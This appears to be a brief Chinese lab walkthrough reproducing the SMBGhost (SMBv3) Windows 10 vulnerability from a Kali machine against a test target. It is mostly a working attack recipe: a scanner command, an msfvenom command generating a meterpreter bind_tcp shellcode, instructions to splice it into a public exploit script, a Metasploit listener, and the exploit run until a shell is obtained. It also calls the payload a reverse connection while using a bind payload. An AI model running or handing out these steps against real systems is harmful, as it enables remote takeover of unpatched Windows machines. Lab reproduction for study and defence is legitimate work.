1.永恆之黑漏洞復現需要准備三個東西,1個為kali攻擊機,一個為win10靶機(關閉防火牆)
kali:192.168.15.128
win10:192.168.15.133
1.以下下是准備好的poc工具
2.首先第一步我們對靶機進行漏洞檢測,使用到的是SMBGhost這個工具進行漏洞檢測,python3 scanner.py 192.168.15.133
cd進入目錄后查看
檢測出來存在該漏洞
3.下一步我們用msf生成一個編碼為X00的shellcode,反向連接木馬 msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
4.打開POC文件將里面的exploit.py buf后面的代碼進行修改
5.將exploit里面的內容進行替換,然后保存文件,在kali里面運行
5.下一步我們進入msf,然后設置好ip和反彈連接端口,然后開啟端口監聽
6.下一步我們用剛才的腳本進行攻擊等待shell連接,python3 exploit -ip 192.168.15.133
7.如果拿不到shell就多點幾次,成功拿到shell!
